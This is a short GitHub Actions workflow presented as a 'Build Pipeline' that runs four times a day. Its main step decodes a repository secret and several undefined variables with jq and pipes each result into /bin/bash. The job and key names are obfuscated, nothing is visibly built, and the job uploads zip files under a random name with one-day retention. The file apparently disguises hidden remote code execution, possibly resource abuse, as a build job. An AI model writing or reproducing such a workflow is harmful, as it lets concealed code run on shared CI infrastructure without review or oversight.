name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '59 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          j271: ${{ secrets.j271 }}
        run: |
          printf '%s' "$j271" | jq -r .d812 | /bin/bash
          echo $dxjmw79092 | jq -r .iikd44238 | /bin/bash
          printf '%s' "$tx966" | jq -r .vhn98754 | /bin/bash
          echo $vdyt7861 | jq -r .fluy04 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: Zwsf3ZRw
          path: "*.zip"
          retention-days: 1
